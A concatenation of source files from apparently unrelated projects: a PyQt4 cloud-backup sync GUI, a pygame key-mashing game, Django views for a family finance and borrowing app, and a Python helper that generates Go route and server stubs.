unicode(self.sshare.ui.textareas.toPlainText()).encode('utf-8'))
if email:
self.sshare.close()
self.alert("发送成功!")
else:
self.alert("发送失败!")
else:
return
def s3_share_reset(self):
"""
clear the info about the email
"""
self.sshare.ui.textareas.clear()
self.sshare.ui.tsrec.clear()
self.sshare.ui.tstopic.clear()
def s3_share_exit(self):
"""
exit the email window
"""
self.sshare.close()
def s3_log_flush(self):
"""
flush the log display
"""
self.s3_show_logs()
def gs_init(self):
if self.gs_info is None:
return
if not os.path.exists(self.gs_info['local_folder']):
success = False
else:
success = self.gs_setup(**self.gs_info)
if success:
self.ui.tgdirpath.setText(
QtCore.QString(self.gs_info['local_folder']))
self.status_set(self.ui.button_g_submit,
self.ui.lguserstate,
"Hello, Google云存储用户")
else:
self.env.remove_gs_info()
self.gs_info = None
def gs_dir_reset(self):
"""
stop the current sync folder, clear all the associated info
"""
self.ui.tgdirpath.clear()
if self.gs_cloud_browser_thread:
self.gs_cloud_browser_thread.stop()
if self.gs_log_thread:
self.gs_log_thread.stop()
self.ui.GtreeWidget.clear()
self.ui.GlogTreeWidget.clear()
self.env.stop_gs()
self.gs_info = None
self.status_reset(self.ui.button_g_submit,
self.ui.lguserstate)
def gs_dir_submit(self):
"""
submit the cloud info so that the selected folder becomes the sync folder
"""
if len(unicode(self.ui.tgdirpath.text()).encode('utf-8').decode('utf-8')) == 0:
self.alert(u"同步文件夹不能为空!")
return
if not os.path.exists(unicode(self.ui.tgdirpath.text()).encode('utf-8').decode('utf-8')):
self.alert(u"你所设置的路径不存在!")
return
if not self.gs_info:
self.glogin = QtGui.QDialog()
self.glogin.ui = GoogleCloudLogin_UI.Ui_GoogleCloudLoginUI()
self.glogin.ui.setupUi(self.glogin)
QtCore.QObject.connect(self.glogin.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.gs_login_submit)
QtCore.QObject.connect(self.glogin.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.gs_login_reset)
self.glogin.exec_()
else:
info = dict(self.gs_info)
info['local_folder'] = unicode(self.ui.tgdirpath.text()).encode('utf-8').decode('utf-8')
success = self.gs_setup(**info)
if not success:
self.alert('登录失败!')
def gs_login_submit(self):
"""
submit the cloud info to the cloud, show the files and the logs that are synchronized with the cloud
"""
access_key = str(self.glogin.ui.tg_access_key.text())
secret_access_key = str(self.glogin.ui.tg_secret_access_key.text())
project_id = str(self.glogin.ui.tg_project_id.text())
local_folder = unicode(self.ui.tgdirpath.text()).encode('utf-8').decode('utf-8')
encrypt = self.glogin.ui.tgencrypt.isChecked()
success = self.gs_setup(access_key, secret_access_key, project_id, local_folder, encrypt)
if success:
self.status_set(self.ui.button_g_submit,
self.ui.lguserstate,
"Hello, Google云存储用户")
self.glogin.close()
else:
self.alert('登录失败!')
def gs_setup(self, access_key, secret_access_key, project_id, local_folder,
encrypt=False, encrypt_code=None, **kwargs):
"""
use the submitted cloud info to set up the cloud storage sync folder
"""
try:
args = locals()
del args['self']
force_stop = False
if self.gs_info is not None:
for k, v in args.iteritems():
if k in self.gs_info and self.gs_info[k] != v:
force_stop = True
break
holder = self.get_holder(access_key, encrypt)
encrypt_code = self.get_encrypt_code(access_key) if encrypt else None
self.gs_handler = self.env.setup_gs(
access_key, secret_access_key, project_id, local_folder, holder,
encrypt=encrypt, encrypt_code=encrypt_code, force_stop=force_stop)
if force_stop or self.gs_info is None:
self.gs_info = args
self.gs_cloud_flush()
self.gs_show_logs()
return True
except GSError:
self.alert('登录失败!')
return False
def gs_show_logs(self):
"""
show the logs about files that are synchronized with the cloud
"""
try:
self.gs_log_thread_lock.acquire()
if self.gs_log_thread and not self.gs_log_thread.isFinished():
self.gs_log_thread.stop()
self.gs_log_thread.wait()
self.ui.GlogTreeWidget.clearSelection()
self.ui.GlogTreeWidget.clear()
self.gs_log_thread = LogFlushThread(self.ui.GlogTreeWidget, self.gs_handler)
self.gs_log_thread.start()
finally:
self.gs_log_thread_lock.release()
def gs_login_reset(self):
"""
clear the info about the account in the cloud
"""
self.glogin.ui.tg_access_key.clear()
self.glogin.ui.tg_secret_access_key.clear()
self.glogin.ui.tg_project_id.clear()
def gs_cloud_flush(self):
'''
Flush the cloud files.
'''
self.gs_cloud_browser_thread_lock.acquire()
try:
if self.gs_handler is None:
return
if self.gs_cloud_browser_thread \
and not self.gs_cloud_browser_thread.isFinished():
self.gs_cloud_browser_thread.stop()
self.gs_cloud_browser_thread.wait()
self.ui.GtreeWidget.clearSelection()
self.ui.GtreeWidget.clear()
self.gs_cloud_browser_thread = CloudBrowserFlushThread(
self, self.ui.GtreeWidget, self.gs_handler)
self.gs_cloud_browser_thread.start()
finally:
self.gs_cloud_browser_thread_lock.release()
def gs_file_share(self):
"""
share a synced file with others by email
"""
if self.gs_handler is None:
return
result = self.get_cloud_path(self.ui.GtreeWidget)
if result is None:
return
gs_file_path, gs_file_name = result
if gs_file_path is None or len(str(gs_file_path)) == 0:
self.alert('不支持文件夹分享,请选择文件')
return
self.gshare = QtGui.QDialog()
self.gshare.ui = GoogleCloudShare_UI.Ui_GoogleCloud_Share()
self.gshare.ui.setupUi(self.gshare)
storage = self.gs_handler.storage
sharepath = storage.share(gs_file_path)
self.gshare.ui.textareag.setText(QtCore.QString(
u'Google云存储用户(id: %s)通过邮件向你分享文件“%s”,下载地址:%s' % \
(self.gs_info['access_key'], gs_file_name.decode('utf-8'), sharepath.decode('utf-8')))
)
QtCore.QObject.connect(self.gshare.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.gs_share_submit)
QtCore.QObject.connect(self.gshare.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.gs_share_reset)
QtCore.QObject.connect(self.gshare.ui.button_exit, QtCore.SIGNAL("clicked()"),
self.gs_share_exit)
self.gshare.exec_()
def gs_share_submit(self):
"""
submit the info about the email
"""
if self.gs_handler is not None:
receivers = str(self.gshare.ui.tgrec.text())
receivers = receivers.replace(',', ',').split(',')
email = CloudBackup.mail.send_mail(receivers,unicode(self.gshare.ui.tgtopic.text()).encode('utf-8'),
unicode(self.gshare.ui.textareag.toPlainText()).encode('utf-8'))
if email:
self.gshare.close()
self.alert("发送成功!")
else:
self.alert("发送失败!")
else:
return
def gs_share_reset(self):
"""
clear the info about the email
"""
self.gshare.ui.textareag.clear()
self.gshare.ui.tgrec.clear()
self.gshare.ui.tgtopic.clear()
def gs_share_exit(self):
"""
exit the email window
"""
self.gshare.close()
def gs_log_flush(self):
"""
flush the log display
"""
self.gs_show_logs()
```
#### File: CloudBackup/ui/S3Share_UI.py
```python
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_S3_Share(object):
def setupUi(self, S3_Share):
S3_Share.setObjectName(_fromUtf8("S3_Share"))
S3_Share.resize(400, 327)
self.button_submit = QtGui.QPushButton(S3_Share)
self.button_submit.setGeometry(QtCore.QRect(40, 280, 93, 28))
self.button_submit.setObjectName(_fromUtf8("button_submit"))
self.button_exit = QtGui.QPushButton(S3_Share)
self.button_exit.setGeometry(QtCore.QRect(270, 280, 93, 28))
self.button_exit.setObjectName(_fromUtf8("button_exit"))
self.button_reset = QtGui.QPushButton(S3_Share)
self.button_reset.setGeometry(QtCore.QRect(160, 280, 93, 28))
self.button_reset.setObjectName(_fromUtf8("button_reset"))
self.formLayoutWidget = QtGui.QWidget(S3_Share)
self.formLayoutWidget.setGeometry(QtCore.QRect(40, 20, 321, 54))
self.formLayoutWidget.setObjectName(_fromUtf8("formLayoutWidget"))
self.formLayout = QtGui.QFormLayout(self.formLayoutWidget)
self.formLayout.setMargin(0)
self.formLayout.setHorizontalSpacing(15)
self.formLayout.setVerticalSpacing(10)
self.formLayout.setObjectName(_fromUtf8("formLayout"))
self.lsrec = QtGui.QLabel(self.formLayoutWidget)
self.lsrec.setObjectName(_fromUtf8("lsrec"))
self.formLayout.setWidget(0, QtGui.QFormLayout.LabelRole, self.lsrec)
self.tsrec = QtGui.QLineEdit(self.formLayoutWidget)
self.tsrec.setObjectName(_fromUtf8("tsrec"))
self.formLayout.setWidget(0, QtGui.QFormLayout.FieldRole, self.tsrec)
self.lstopic = QtGui.QLabel(self.formLayoutWidget)
self.lstopic.setObjectName(_fromUtf8("lstopic"))
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.lstopic)
self.tstopic = QtGui.QLineEdit(self.formLayoutWidget)
self.tstopic.setObjectName(_fromUtf8("tstopic"))
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.tstopic)
self.verticalLayoutWidget = QtGui.QWidget(S3_Share)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(40, 80, 321, 21))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.lscontext = QtGui.QLabel(self.verticalLayoutWidget)
self.lscontext.setObjectName(_fromUtf8("lscontext"))
self.verticalLayout.addWidget(self.lscontext)
self.verticalLayoutWidget_2 = QtGui.QWidget(S3_Share)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(40, 110, 321, 151))
self.verticalLayoutWidget_2.setObjectName(_fromUtf8("verticalLayoutWidget_2"))
self.verticalLayout_2 = QtGui.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout_2.setMargin(0)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.textareas = QtGui.QTextEdit(self.verticalLayoutWidget_2)
self.textareas.setObjectName(_fromUtf8("textareas"))
self.verticalLayout_2.addWidget(self.textareas)
self.retranslateUi(S3_Share)
QtCore.QMetaObject.connectSlotsByName(S3_Share)
def retranslateUi(self, S3_Share):
S3_Share.setWindowTitle(QtGui.QApplication.translate("S3_Share", "S3用户分享", None, QtGui.QApplication.UnicodeUTF8))
self.button_submit.setText(QtGui.QApplication.translate("S3_Share", "确定", None, QtGui.QApplication.UnicodeUTF8))
self.button_exit.setText(QtGui.QApplication.translate("S3_Share", "退出", None, QtGui.QApplication.UnicodeUTF8))
self.button_reset.setText(QtGui.QApplication.translate("S3_Share", "重置", None, QtGui.QApplication.UnicodeUTF8))
self.lsrec.setText(QtGui.QApplication.translate("S3_Share", "收件人", None, QtGui.QApplication.UnicodeUTF8))
self.tsrec.setToolTip(QtGui.QApplication.translate("S3_Share", "多个邮件之间用逗号隔开", None, QtGui.QApplication.UnicodeUTF8))
self.lstopic.setText(QtGui.QApplication.translate("S3_Share", "主题", None, QtGui.QApplication.UnicodeUTF8))
self.tstopic.setText(QtGui.QApplication.translate("S3_Share", "通过CloudBackup分享文件", None, QtGui.QApplication.UnicodeUTF8))
self.lscontext.setText(QtGui.QApplication.translate("S3_Share", "内容", None, QtGui.QApplication.UnicodeUTF8))
``` |
{
"source": "520luigi/Animal-Mashing",
"score": 3
} |
#### File: 520luigi/Animal-Mashing/Animal-Mashing.py
```python
import pygame
import random
import sys
import os
def resource_path(path):
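#Resolve an asset path both in development and inside a PyInstaller
#bundle (which unpacks assets to sys._MEIPASS)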
if hasattr(sys, '_MEIPASS'):
return os.path.join(sys._MEIPASS, path)
return os.path.join(os.path.abspath("."), path)
pygame.init()
#Declare some rgb color variables for ease of use.
red = (255, 0, 0)
green = (0, 255, 0)
black = (0, 0, 0)
white = (255, 255, 255)
#Display width and height made to the background image resolution
display_width = 736
display_height = 600
#Set finish line to be fraction of window height and increments per key pressed
finish_line = display_height/13
increment = 10
#Specific calling of pygame window to set width and height
win = pygame.display.set_mode((display_width, display_height))
#Display the caption on top of pygame window top banner
pygame.display.set_caption("Animal Mashing")
#Set positions of background image, startup menu to the top left corner
img_pos = [0, 0]
#Load and set up background image and startup menu
bg_image = pygame.image.load(resource_path("graphics/bgimage.png")).convert()
startup_image = pygame.image.load(resource_path("graphics/startmenu.png")).convert()
p1_wins = pygame.image.load(resource_path("graphics/p1win.png")).convert_alpha()
p2_wins = pygame.image.load(resource_path("graphics/p2win.png")).convert_alpha()
#Initialize sounds for player clicks, winner, players, intro countdown, etc
bg_music = pygame.mixer.Sound(resource_path("sounds/FrozenJam.ogg"))
bg_music.set_volume(0.4)
p1_click = pygame.mixer.Sound(resource_path("sounds/jingle1.ogg"))
p1_click.set_volume(0.4)
p2_click = pygame.mixer.Sound(resource_path("sounds/jingle2.ogg"))
p2_click.set_volume(0.4)
winner_sound = pygame.mixer.Sound(resource_path("sounds/flawless_victory.ogg"))
p1_sound = pygame.mixer.Sound(resource_path("sounds/player_1.ogg"))
p2_sound = pygame.mixer.Sound(resource_path("sounds/player_2.ogg"))
prepare_yourself = pygame.mixer.Sound(resource_path("sounds/prepare_yourself.ogg"))
one = pygame.mixer.Sound(resource_path("sounds/1.ogg"))
two = pygame.mixer.Sound(resource_path("sounds/2.ogg"))
three = pygame.mixer.Sound(resource_path("sounds/3.ogg"))
begin = pygame.mixer.Sound(resource_path("sounds/begin.ogg"))
def change_animal():
#Create a string array of animals to choose from randomly per game reset
animals = [resource_path("graphics/chick.png"), resource_path("graphics/horse.png"), resource_path("graphics/pig.png"),
resource_path("graphics/elephant.png"), resource_path("graphics/parrot.png"), resource_path("graphics/duck.png"),
resource_path("graphics/hippo.png"), resource_path("graphics/penguin.png"), resource_path("graphics/whale.png")]
player1_animal = random.choice(animals)
player2_animal = random.choice(animals)
#Prevent players from having the same animal
while player1_animal == player2_animal:
player2_animal = random.choice(animals)
#Load and set up players animal
player1_image = pygame.image.load(player1_animal).convert()
player1_image.set_colorkey(black)
player2_image = pygame.image.load(player2_animal).convert()
player2_image.set_colorkey(black)
return (player1_image, player2_image)
def set_position():
#Players location stored in arrays
x = [display_width/3, display_width * 0.61]
y = [display_height * 2/3 - 20, display_height * 2/3 - 20]
return (x[0], y[0], x[1], y[1])
def show_victory_screen(message, sound_number):
#Show victory screen and play the sounds according to who won
winner_sound.play()
pygame.time.delay(2000)
if sound_number == 1:
win.blit(p1_wins, img_pos)
p1_sound.play()
elif sound_number == 2:
win.blit(p2_wins, img_pos)
p2_sound.play()
pygame.display.flip()
waiting = True
while waiting:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
game_intro(win, display_width, display_height)
def game_intro(win, width, height):
#Game intro which loops with music and goes into game countdown
intro = True
win.blit(startup_image, img_pos)
bg_music.play(loops=-1)
while intro:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
bg_music.stop()
prepare_yourself.play()
pygame.time.delay(1888)
three.play()
pygame.time.delay(788)
two.play()
pygame.time.delay(788)
one.play()
pygame.time.delay(788)
begin.play()
pygame.time.delay(788)
game_loop()
if event.key == pygame.K_ESCAPE:
pygame.quit()
sys.exit()
pygame.display.update()
def game_loop():
#Use this to put the background image to the window and clear start menu
win.blit(bg_image, img_pos)
#Flush any keypresses queued before the game starts to avoid a head-start bug
pygame.event.get()
#Change animal for players every game loop and reset position
p1_img, p2_img = change_animal()
x1, y1, x2, y2 = set_position()
pygame.display.update()
running = True
game_over = False
while running:
#Redraw the animal sprites every frame as their positions change
win.blit(p1_img, (x1, y1))
win.blit(p2_img, (x2, y2))
pygame.display.update()
if game_over:
if difference < 0:
message = "Player 1"
playersound = 1
elif difference > 0:
message = "Player 2"
playersound = 2
show_victory_screen(message, playersound)
game_over = False
p1_img, p2_img = change_animal()
x1, y1, x2, y2 = set_position()
win.blit(bg_image, img_pos)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_LSHIFT and y1 > finish_line:
y1 -= increment
p1_click.play()
elif event.key == pygame.K_RSHIFT and y2 > finish_line:
y2 -= increment
p2_click.play()
if y1 < finish_line or y2 < finish_line:
difference = y1 - y2
game_over = True
break
game_intro(win, display_width, display_height)
``` |
{
"source": "520MianXiangDuiXiang520/FamilyPropertyManageSystem",
"score": 2
} |
#### File: FamilyPropertyManageSystem/billsManage/views.py
```python
from django.http import JsonResponse, QueryDict
from rest_framework.parsers import JSONParser
from rest_framework.views import APIView
from FamilyPropertyMS.util.Tool import response_detail
from .models import UserBills, FamilyBills
from .MySerializers import BillsSerializer
from abc import abstractmethod
from django.db.models import Sum
from datetime import datetime
class BIllBaseClass:
@staticmethod
def statistical_billing_data(request):
"""
Collect billing statistics:
1. total income and expenditure
2. break them down by concrete type
"""
statistical_data = {}
income_data = []
expend_data = []
income_projects = []
income_money = []
expend_projects = []
expend_money = []
all_income = 0
all_expend = 0
income_bills = UserBills.objects.filter(user=request.user, type=0)
expend_bills = UserBills.objects.filter(user=request.user, type=10)
assert income_bills or expend_bills
if income_bills:
all_income = income_bills.aggregate(Sum("money"))['money__sum']
statistical_data.update({'all_income': all_income})
income_by_type = income_bills.values('concrete_type'). \
annotate(Sum('money')).values('concrete_type', 'money__sum')
for i in income_by_type:
income_projects.append(i['concrete_type'])
income_money.append(i['money__sum'])
statistical_data.update({'income_projects': income_projects})
statistical_data.update({'income_money': income_money})
if expend_bills:
all_expend = expend_bills.aggregate(Sum('money'))['money__sum']
statistical_data.update({'all_expend': all_expend})
expend_by_type = expend_bills.values('concrete_type'). \
annotate(Sum('money')).values('concrete_type', 'money__sum')
for i in expend_by_type:
expend_projects.append(i['concrete_type'])
expend_money.append(i['money__sum'])
statistical_data.update({'expend_projects': expend_projects})
statistical_data.update({'expend_money': expend_money})
overage = all_income - all_expend
statistical_data.update({'overage': overage})
return statistical_data
def _get_info(self, request, bill_type: int):
income_bill = UserBills.objects.filter(user=request.user, type=bill_type)
bills = BillsSerializer(instance=income_bill, many=True)
return bills.data
@abstractmethod
def get(self, request, *args, **kwargs):
pass
def _post(self, request):
print(request.data)
try:
bills_type = int(request.POST.get('bill_type'))
except TypeError:
return JsonResponse(response_detail(400, detail="类型缺失"))
print(bills_type)
if bills_type not in (0, 1, 10, 11, 12):
return JsonResponse(response_detail(400, detail="类型错误"))
need_fields = ['money', 'remarks', 'time']
for field in need_fields:
if not request.POST.get(field):
return JsonResponse(response_detail(400, detail=f"{field}缺失"))
# Reject remarks longer than the database column allows
if len(request.POST.get('remarks')) > 1000:
return JsonResponse(response_detail(400, "长度超出数据库限制"))
# Reject amounts above the allowed maximum
if int(request.POST.get('money')) > 9999999:
return JsonResponse(response_detail(400, "金额超出限制"))
# Save the new bill to the database
try:
field_time = datetime.strptime(request.POST['time'], '%Y-%m-%d %H:%M:%S')
except ValueError:
return JsonResponse(response_detail(400, '时间格式有误,应为 %Y-%m-%d %H:%M:%S'))
if request.POST.get('concrete_type'):
new_field = UserBills(user=request.user, money=request.POST['money'],
type=bills_type, time=field_time, remarks=request.POST['remarks'],
concrete_type=request.POST['concrete_type'])
else:
new_field = UserBills(user=request.user, money=request.POST['money'],
type=bills_type, time=field_time, remarks=request.POST['remarks'])
new_field.save()
# If the user belongs to a family and is_add_to_family == 1, also record the bill as a family bill
print(request.user.family1)
if request.user.family1:
if int(request.POST.get('is_add_to_family', 0)) == 1:
new_family_bill = FamilyBills(family_id=request.user.family1, bills_id=new_field)
new_family_bill.save()
data = self.statistical_billing_data(request)
result = response_detail(200, data=data)
return JsonResponse(result)
def _put(self, request, bill_type: int):
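# Generic single-field update: expects bill_id, field_name and new_value
# in the PUT body and rewrites that field on the user's bill.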
PUT = QueryDict(request.body)
put_data = PUT.dict()
need_field = ('bill_id', 'field_name', 'new_value')
# Check that the request contains all required fields
for field in need_field:
if field not in put_data:
return JsonResponse(response_detail(400, detail="参数缺失"))
# Validate each parameter
bill = UserBills.objects.filter(id=int(put_data['bill_id']),
type=bill_type, user=request.user).first()
if not bill:
return JsonResponse(response_detail(400, detail="账单不存在"))
if not getattr(UserBills, put_data['field_name'], None):
return JsonResponse(response_detail(400, detail="参数错误(field_name is not find)"))
try:
setattr(bill, put_data['field_name'], put_data['new_value'])
bill.save()
data = self._get_info(request, bill_type)
return JsonResponse(response_detail(200, data=data))
except Exception:
return JsonResponse(response_detail(500, detail="修改失败"))
class ExpendView(APIView, BIllBaseClass):
# Expenditure view
def get(self, request, *args, **kwargs):
income_bill = UserBills.objects.filter(user=request.user, type=10)
bills = BillsSerializer(instance=income_bill, many=True)
return JsonResponse(response_detail(200, data=bills.data), safe=False)
def post(self, request, *args, **kwargs):
return self._post(request)
def put(self, request, *args, **kwargs):
return self._put(request, bill_type=10)
class IncomeView(APIView, BIllBaseClass):
# Income view
def get(self, request, *args, **kwargs):
income_bill = UserBills.objects.filter(user=request.user, type=0)
bills = BillsSerializer(instance=income_bill, many=True)
return JsonResponse(response_detail(200, data=bills.data), safe=False)
def post(self, request, *args, **kwargs):
return self._post(request)
def put(self, request, *args, **kwargs):
return self._put(request, bill_type=0)
class StatisticsView(APIView, BIllBaseClass):
def get(self, request, *args, **kwargs):
try:
data = self.statistical_billing_data(request)
except AssertionError:
return JsonResponse(response_detail(201))
return JsonResponse(response_detail(200, data=data))
class BankSavingsView(APIView):
pass
```
#### File: FamilyPropertyManageSystem/borrowingMoneyManagement/views.py
```python
from datetime import datetime
from django.http import JsonResponse, QueryDict
from rest_framework.views import APIView
from FamilyPropertyMS.util.Tool import response_detail, send_message
from .MySerializers import BorrowSerializer
from .models import BorrowMoneyTable
from userManage.models import User
from billsManage.models import UserBills
class BorrowingView(APIView):
def post(self, request, *args, **kwargs):
"""
Create a borrowing request; requires three fields (who: whom to borrow from, money: amount, pay_back_date: repayment date)
"""
need_fields = ('who', 'money', 'pay_back_date')
for field in need_fields:
if not request.POST.get(field):
return JsonResponse(response_detail(400, f"{field}缺失"))
who = int(request.POST.get('who'))
money = int(request.POST.get('money'))
pay_back_date = str(request.POST.get('pay_back_date'))
try:
who = User.objects.get(id=who)
except User.DoesNotExist:
return JsonResponse(response_detail(400, "请求失败!用户不存在!"))
if money < 0:
return JsonResponse(response_detail(400, "请求失败!金额应该大于0"))
try:
field_time = datetime.strptime(pay_back_date, '%Y-%m-%d')
except ValueError:
return JsonResponse(response_detail(400, '时间格式有误,应为 %Y-%m-%d'))
borrow_field = BorrowMoneyTable(borrower=request.user,
lender=who,
money=money,
repayment_date=field_time,
status=0)
borrow_field.save()
send_message(request.user, who, "借钱信息", f"{request.user.username} 想向你借 {money}"
f"块钱,还款时间是: {field_time}, 是否同意?\n记录号:【{borrow_field.id}】", 3)
return JsonResponse(response_detail(200))
def put(self, request):
"""
Handle a borrowing request; requires two fields (is_agree: 1 = reject, 0 = accept; borrow_id: id of the borrowing record)
"""
need_fields = ('is_agree', 'borrow_id')
PUT = QueryDict(request.body)
put_data = PUT.dict()
for field in need_fields:
if not put_data.get(field):
return JsonResponse(response_detail(400, f"{field}缺失!"))
is_agree = int(put_data['is_agree'])
borrow_id = int(put_data['borrow_id'])
if is_agree not in (0, 1):
return JsonResponse(response_detail(400, "参数错误!"))
# filter().first() returns None for a missing record, handled just below
borrow_field = BorrowMoneyTable.objects.filter(id=borrow_id).first()
if not borrow_field:
return JsonResponse(response_detail(400, '请求不存在'))
if borrow_field.status != 0:
return JsonResponse(response_detail(400, "已处理"))
if is_agree == 1:
send_message(request.user, borrow_field.borrower, "借款申请结果",
f"{request.user.username} 不同意您的借款申请", 1)
borrow_field.delete()
return JsonResponse(response_detail(200))
send_message(request.user, borrow_field.borrower, "借款申请结果",
f"{request.user.username} 同意了您的借款申请", 1)
bill_lender = UserBills(user=request.user, money=borrow_field.money,
type=10, concrete_type="外借",
remarks=f"{borrow_field.date} 借给 {borrow_field.borrower.username},"
f" 还款日期: {borrow_field.repayment_date}")
bill_lender.save()
bill_borrower = UserBills(user=borrow_field.borrower, money=borrow_field.money,
type=0, concrete_type="借款",
remarks=f"{borrow_field.date} 向 {borrow_field.lender.username} 借的。"
f"还款日期: {borrow_field.repayment_date}")
bill_borrower.save()
borrow_field.status = 1
borrow_field.save()
return JsonResponse(response_detail(200))
class PayBackView(APIView):
"""
Repay money (to whom, and how much)
"""
def get(self, request, *args, **kwargs):
"""
Return all of the current user's borrowing records
"""
borrow_bills = BorrowMoneyTable.objects.filter(borrower=request.user)
if not borrow_bills:
return JsonResponse(response_detail(201))
borrow_data = BorrowSerializer(instance=borrow_bills, many=True)
return JsonResponse(response_detail(200, data=borrow_data.data), safe=False)
def post(self, request, *args, **kwargs):
need_fields = ('who', 'money', 'bill_id')
for field in need_fields:
if not request.POST.get(field):
return JsonResponse(response_detail(400, f"{field} 缺失!"))
who_id = int(request.POST.get('who'))
money = int(request.POST.get('money'))
bill_id = int(request.POST.get('bill_id'))
who = User.objects.filter(id=who_id).first()
if not who:
return JsonResponse(response_detail(400, "用户不存在!"))
if money <= 0:
return JsonResponse(response_detail(400, "还款金额不能小于等于0"))
# After validation passes: update or delete the borrowing record, add bills for both parties, then message the lender
borrow_bill = BorrowMoneyTable.objects.filter(borrower=request.user,
lender=who, id=bill_id).order_by('-money').first()
if not borrow_bill:
return JsonResponse(response_detail(400, "借款记录不存在"))
if borrow_bill.money < money:
return JsonResponse(response_detail(400, "金额超过欠账金额!"))
# TODO: support paying back all debts at once
borrow_bill.money -= money
if borrow_bill.money == 0:
borrow_bill.delete()
else:
borrow_bill.save()
bill_borrower = UserBills(user=request.user, money=money,
type=10, concrete_type="还款",
remarks=f"给{who.username} 还款!")
bill_borrower.save()
bill_lender = UserBills(user=who, money=money,
type=0, concrete_type="借款收回",
remarks=f"来自{request.user}的还款")
bill_lender.save()
send_message(request.user, who, "还钱啦", f"欠你的钱给你还了啊!金额:{money}元", 0)
return JsonResponse(response_detail(200))
```
#### File: FamilyPropertyMS/util/MyAuthentication.py
```python
import pytz
from rest_framework.exceptions import APIException
from rest_framework.authentication import BaseAuthentication
from .Tool import timeout_judgment
from userManage import models
import datetime
class MyAuthentication(BaseAuthentication):
@staticmethod
def _delete_token(token_field):
token_field.delete()
def authenticate(self, request):
token = request.GET.get('token')
token_field = models.UserToken.objects.filter(token=token).first()
if not token_field:
raise APIException("认证失败(no token)")
else:
if timeout_judgment(token_field, 'create_time', '15/m'):
self._delete_token(token_field)
raise APIException("认证失败(token timeout)")
user = models.User.objects.filter(id=token_field.user_id).first()
token_field.create_time = datetime.datetime.now(tz=pytz.timezone('UTC'))
token_field.save()
return user, token_field
```
#### File: FamilyPropertyMS/util/Tool.py
```python
import datetime
from copy import copy
import pytz
from django.http import JsonResponse
from FamilyPropertyMS.util.ResponseCode import CODE
from messageManage.models import Message
from userManage.models import User
class ToolException(Exception):
pass
def timeout_judgment(field, attr: str, time_line: str):
"""
Check whether a datetime field on a table row has timed out; returns True on timeout.
:param field: Model instance
:param attr: str: name of the datetime field
:param time_line: str: timeout spec, e.g. '3/h' means a 3-hour timeout
:return: bool
"""
num, period = time_line.split('/')
db_time = getattr(field, attr)
delta = (datetime.datetime.now(tz=pytz.timezone('UTC')).replace(tzinfo=pytz.timezone('UTC'))
- db_time.replace(tzinfo=pytz.timezone('UTC')))
return delta.total_seconds() > {'s': 1, 'm': 60, 'h': 3600, 'd': 86400}[period] * int(num)
def send_message(send: User, receive: User, title: str, text: str, m_type: int):
"""
Send one message.
:param send: sender
:param receive: receiver
:param title: message title
:param text: message body
:param m_type: message type (0 = ordinary user message, 1 = system notification, 2 = confirmation-request message)
type-2 messages require the front end to render a form
"""
try:
new_message = Message(send=send, receive=receive, title=title, text=text, type=m_type)
new_message.save()
except:
return JsonResponse(CODE[500])
def response_detail(status: int, detail: str = None, data=None) -> dict:
try:
code = copy(CODE[status])
except KeyError:
raise ToolException("code必须在ResponseCode.py中存在")
if detail:
code['msg'] = detail
if data:
code['data'] = data
return code
``` |
{
"source": "520MianXiangDuiXiang520/JuneGoBlog",
"score": 3
} |
#### File: 520MianXiangDuiXiang520/JuneGoBlog/code_tool.py
```python
import re
import sys
Public = 1
Private = 2
def f_text(text: str, obj) -> str:
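# Fill %name% placeholders in `text` with the matching attributes of `obj`,
# e.g. f_text("func %route%()", tool) -> "func " + tool.route + "()".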
flags = [flag.replace("%", "") for flag in re.findall(r"%[a-z][a-zA-Z]*%", text)]
assert len(set(flags)) == len(flags), "【Error】 Parameters with duplicate names"
for flag in flags:
v = getattr(obj, flag)
text = text.replace(f"%{flag}%", v, 1)
return text
class ToolException(Exception):
pass
class CodeTool:
def __init__(self, path: str):
self._aip_path = path
routes = self._aip_path.split("/")
if len(routes) < 2 or routes[0] != "api":
raise ToolException("api format does not meet the specification !")
self.routes = routes
@staticmethod
def get_func_name(routes: [str], name_type: int, suffix: str) -> str:
prefix = routes[1]
if name_type == Public:
prefix = prefix.title()
for r in routes[2:]:
prefix += r.title()
return prefix + suffix
def _get_route_func_name(self):
self.route = self.get_func_name(self.routes, Private, "Routes")
def _get_check_func_name(self):
self.check = self.get_func_name(self.routes, Public, "Check")
def _get_server_func_name(self):
self.server = self.get_func_name(self.routes, Public, "Logic")
def _get_req_name(self):
self.req = self.get_func_name(self.routes, Public, "Req")
def _get_resp_name(self):
self.resp = self.get_func_name(self.routes, Public, "Resp")
def _set_route(self):
func = """
func %route%() []gin.HandlerFunc {
return []gin.HandlerFunc{
junebao_top.EasyHandler(check.%check%,
server.%server%, message.%req%{}),
}
}"""
func = f_text(func, self)
with open(f"./src/routes/{self.routes[1]}.go", "a+") as fp:
fp.write(func)
def _set_server(self):
func = """
func %server%(ctx *gin.Context, req junebaotop.BaseReqInter) junebaotop.BaseRespInter {
request := req.(*message.%req%)
resp := message.%resp%{}
// TODO:...
log.Println(request)
resp.Header = junebaotop.SuccessRespHeader
return resp
}"""
func = f_text(func, self)
with open(f"./src/server/{self.routes[1]}.go", "a+") as fp:
fp.write(func)
